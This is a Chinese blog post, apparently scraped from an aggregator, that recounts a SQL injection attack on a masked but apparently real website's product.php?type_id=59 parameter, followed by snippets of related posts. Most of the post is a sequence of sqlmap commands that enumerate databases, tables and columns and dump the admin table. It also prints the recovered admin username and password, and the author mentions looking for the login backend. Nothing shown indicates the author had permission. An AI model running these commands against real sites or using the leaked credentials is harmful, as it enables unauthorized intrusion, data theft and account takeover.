2. 程式人生 > >記一次簡單的sql註入

記一次簡單的sql註入

阿新 發佈:2019-02-10
-- 截圖 是否有效 src bsp 構造 mage nbsp inf

什麽是sql註入攻擊? 所謂SQL註入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用來構造(或者影響)動態SQL命令,或作為存儲過程的輸入參數,這類表單特別容易受到SQL註入式攻擊。

1.判斷註入點是否有效

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59"

技術分享圖片

2,查找數據庫

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --dbs

技術分享圖片

爆出數據庫名了, uxRaMeqAZwAyvZqJXiZP

3,通過1中的數據庫查找對應的表

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --tables -D "uxRaMeqAZwAyvZqJXiZP"

技術分享圖片

4,通過2中的數據表得到字段

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --columns -D "uxRaMeqAZwAyvZqJXiZP" -T "admin"

技術分享圖片

4,通過3得到字段值,即賬號密碼

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --dump -D "uxRaMeqAZwAyvZqJXiZP" -T "admin" -C "admin_name,admin_pass"

技術分享圖片

登陸賬號密碼為admin,qiju

好了,本來我還想找登陸後臺的,但找不到,我就不截圖了。

記一次簡單的sql註入

相關推薦

dvwa sql爆庫

dvwasql註入 python安裝 sqlmap安裝及使用 一 前期準備1 sqlmap在windows環境下需要python2.7的支持,在python官網下載即可https://www.python.org/2 安裝python2.7,默認即可。安裝完成後需要配置下環境變量。右擊計算機-&g

sql & webshell 的美麗“邂逅”

webshell waf 攻擊 木馬 sql註入 引言 ?一波未平,一波又起。金融公司的業務實在是太引人耳目,何況我們公司的業處正處於風口之上(區塊鏈金融),並且每天有大量現金交易,所以不知道有多少黑客躲在暗處一直在盯著你的系統,讓你防不勝防,並且想方設法的找到突破點,以達到黑客的目的來獲

簡單sql

-- 截圖 是否有效 src bsp 構造 mage nbsp inf 什麽是sql註入攻擊? 所謂SQL註入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用

簡單SQL注入

參考:http://103.238.227.13:10083/ bugku 可以看到編碼是gb2312 測試注入點 id=1和id=1‘ 都沒錯 應該是寬位元組注入,在試試 id=%df’ 報錯 接著來 輸入欄位id=%df’ union se

種的SQL和DNS結合的技巧

其中 where ets 鏈接 是我 例如 .com bar 導致 這個技巧有些另類,當時某業界大佬提點了一下。當時真的真的沒有理解到那種程度,現在可能也是沒有理解到,但是我會努力。 本文章是理解於:http://netsecurity.51cto.com/art/2015

5.簡單sql之2

web安全 sql註入 ctf 實驗吧 提示:有回顯的sql註入 這題其實使用上一篇博文的/**/技術即可獲得flag 上一篇博文簡單sql註入補充: 其實那題還過濾了關鍵詞加空格(只過濾一遍,所以寫兩遍即可),出題者考的是如下sql語句(空格和關鍵詞都要寫兩遍)

偽*sql查詢結果不一致的

vid eight frame and sna parameter -exec video http 調試代碼發現,兩個操作最後都會調用同一個方法。傳入的參數一致,查詢結果卻不一致。 直接說問題原因:我的兩個操作是aop環繞通知先拿到傳入參數以後,校驗是否需要往另一張表中插

2017-2018-2 20179205《網絡攻防技術與實踐》第十周作業 SQL攻擊與實踐

tac 原理 HERE 經典的 事先 不存在 編程語言 行數 顯示 《網絡攻防技術與實踐》第十一周作業 SQL註入攻擊與實踐 1.研究緩沖區溢出的原理,至少針對兩種數據庫進行差異化研究 緩沖區溢出原理 ??在計算機內部,輸入數據通常被存放在一個臨時空間內,這個臨時存放的空

生產SQL強勢優化

有關 10.6 3.1 計算 not row 是否 -s 相減   受同事dd之托,優化一條boss看的報表SQL。dd寫復雜疑難SQL無數,如何寫出優雅的SQL自有一番心得體會。能將一條7表含inner join,left join並含有關聯子查詢的、返回結果集340

zabbix簡單的部署包方式安裝

報錯 article 上海 使用 shang http 配置文件 火墻 安裝mysql zabbix記一次簡單的部署包方式安裝一次過 記一次部署包方式安裝一次過 環境centos7 zabbix 3.2.11 準備工作 關閉防火墻 systemctl stop fire

簡單的破解程式(逆向)

已投稿合天 載入以後然後隨便輸入一個密碼然後在程式中搜索報錯資訊。 例如如下搜尋的:   然後雙擊進入。 然後發現JE將其修改為JEN(JE是==,而JEN是!=,如此便打破了原有的邏輯) 右鍵編輯->二進位制編輯 將74改為75(這裡所說的74、75就是JE

簡單的日誌分析

  題目檔案:https://files.cnblogs.com/files/nul1/access.log.tar 直接搜尋flag發現是一題關於二分法注入。 頁面為200的位元組大小為1765,所以可以通過讀取每行判斷是否有1765以及有沒有flag的關鍵字樣,進而提取值。 指令碼如

簡單爬蟲(豆瓣/dytt)

  磕磕絆絆學python一個月,這次到正則表示式終於能寫點有趣的東西,在此作個記錄:   —————————————————————————————————————————————————   1.爬取豆瓣電影榜前250名單   執行環境: pycha

簡單的程式碼審計

這段時間在想著做個高校的會員管理系統,所以在chrome上裝了個掘金外掛,今天發現日推推了個類似的PHP寫的小程式 本著能省就省,有自行車還造什麼輪子的原則 於是乎 git clone https://github.com/chaodada/member.git 經過簡單的部署後算是能打開了

簡單的UITableView卡頓優化

先說需求,要做一個類似這種的列表 標籤控制元件直接用的第三方 p.p1 { margin: 0.0px 0.0px 0.0px 0.0px; font: 18.0px Menlo; color: #3f6e74; background-color: #e1ffde } YZTagList &nbs

對真實網站的SQL———SQLmap使用

md5 password blog 發生 為我 www mysql 賬戶 9.png 網上有許多手工註入SQL的例子和語句,非常值得我們學習,手工註入能讓我們更加理解網站和數據庫的關系,也能明白為什麽利用註入語句能發現網站漏洞。 因為我是新手,註入語句還不太熟悉,我這次是手

記錄網站漏洞修復過程(三):第二輪處理(攔截SQL、跨站腳本攻擊XSS)

cat nbsp ebe 嵌入 網頁 防止 記錄 用戶輸入 light 在程序編寫的時候采用參數化的SQL語句可以有效的防止SQL註入,但是當程序一旦成型,再去修改大量的數據庫執行語句並不是太現實,對網頁表單上輸入進行校驗是易於實現的方法。在webForm 頁面中開啟校驗屬

SQL其實很簡單,別不留神就被利用了

SQL註入 sqlmap SQL防註入 SQL註入這個詞相信大家應該都不陌生,而且每年都會有這樣子的事情發生,下面我先帶大家回憶11年兩期起比較經典的案例事件: 1、SONY索尼事件2011年4月,著名的×××組織Anonymous***SONY一個網站,一星期後才被發現7千萬的用戶個人信息,其中

c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

4.簡單sql

web安全 sql註入 ctf 實驗吧 根據頁面提示,到底過濾了什麽東西?可以知道一定過濾了什麽.... 分別輸入1,2,3有對應的結果 使用‘會報錯,於是 構造常用的sql語句:1‘ and ‘1‘=‘1 沒有反應試一試1‘ and ‘1‘=‘2